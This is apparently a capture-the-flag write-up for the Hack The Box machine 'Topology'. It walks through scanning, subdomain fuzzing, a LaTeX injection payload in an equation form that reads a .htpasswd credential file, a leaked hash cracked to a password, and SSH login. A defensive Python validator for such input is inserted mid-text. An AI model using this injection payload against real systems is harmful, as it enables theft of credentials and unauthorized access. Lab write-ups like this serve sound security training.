Topology | HTB Writeup | Aayush Agrawal

Establishing the VPN Connection

Download the VPN connection file from HTB, after selecting the desired server (make sure no machines are active on your account at this point).

I use OpenVPN, so in the terminal run the command: openvpn <address_for_the_.ovpn_file>

Note: Command to install OpenVPN in case you do not have it already: sudo apt-get install openvpn

It should set up a VPN connection between your host machine and the HTB server, and a small lock icon with the IP Address for the connection should pop up in the top-right notification section of your Kali system. Try running the command as the root user, in case the normal user account does not get a successful conn

Now proceed to search for the machine, using the search parameter machine: topology in our case on the app.hackthebox.com site. Open the machine information page, and click on the Join Machine button.

Running an Nmap Scan

On entering the IP Address for the machine, we are welcomed with the above webpage, so we will look for open ports through an Nmap scan.

nmap -A -sV 10.10.11.217

Open Ports: 22, 80

Adding IP to /etc/hosts

wfuzz -c -u 'http://topology.htb/' -H 'Host: FUZZ.topology.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

Command to install seclists: sudo apt install seclists

Directory Review

Looking Up Exploit for Latex Software

Injecting the above code into /equation.php input box,

Output:

Getting htpasswd for root directory from Apache vulnerability

Apache version is 2.4.41

Ref. Link: stackoverflow.com/questions/37545711/htpass..

command injected: $\lstinputlisting{/var/www/dev/.htpasswd}$

Output:

Output: vdaisley:$apr1!1ONUB/S2$58eeNVirnRDB5zAIzIxTY0
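The file read above works because the text submitted to /equation.php reaches LaTeX with file-reading macros such as \lstinputlisting still available. One way to close that off is an allowlist check on the formula before it is rendered; this is an added Python example, not code from the machine or from this writeup, and the macro allowlist, the length limit and the name check_equation are assumptions.

```python
import re

# Constructed allowlist of math-only control words; extend it to fit the renderer.
ALLOWED_MACROS = frozenset({
    "frac", "sqrt", "sum", "prod", "int", "lim", "infty", "cdot", "times",
    "left", "right", "alpha", "beta", "gamma", "theta", "pi", "sin", "cos",
    "log", "leq", "geq", "neq", "pm",
})
# A control sequence is a backslash plus letters (or @), or plus one other character.
CONTROL_SEQ = re.compile(r"\\([A-Za-z@]+|.)", re.DOTALL)
# Single-character escapes that only give spacing or literal braces.
ALLOWED_SYMBOLS = frozenset({",", ";", "!", " ", "{", "}"})
MAX_LEN = 500  # assumed limit for one formula


def check_equation(src):
    """Return (ok, reason) for a formula body submitted by a user."""
    if len(src) > MAX_LEN:
        return False, "too long"
    if "$" in src:
        # The template is assumed to supply math mode; '$' would leave it.
        return False, "math-mode delimiter"
    if "^^" in src:
        # TeX caret notation can spell characters the scan below would not see.
        return False, "caret notation"
    if src.endswith("\\"):
        return False, "dangling backslash"
    for m in CONTROL_SEQ.finditer(src):
        name = m.group(1)
        if name not in ALLOWED_MACROS and name not in ALLOWED_SYMBOLS:
            return False, "macro not allowed: \\" + name
    return True, "ok"


if __name__ == "__main__":
    samples = [  # constructed inputs; the third is the input quoted in this writeup
        r"\frac{a}{b} + \sqrt{x^2}",
        r"\sum_{i=0}^{n} i \cdot \alpha",
        r"$\lstinputlisting{/var/www/dev/.htpasswd}$",
        r"\lstinputlisting{/var/www/dev/.htpasswd}",
    ]
    for s in samples:
        print(check_equation(s), s)
```

The check belongs in front of renderer-side limits, not in place of them: in TeX Live, keeping shell escape disabled and setting openin_any = p in texmf.cnf restricts which paths TeX will open.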

Store the output in a .txt file and run against john as,

hashcat analysis for the hash file,

We get the cracked password: calculus20

We can get ssh login for the user vdaisley:

We got the user flag, and root flag. :D

Reference Link: https://techyrick.com/topology-htb-walkthrough/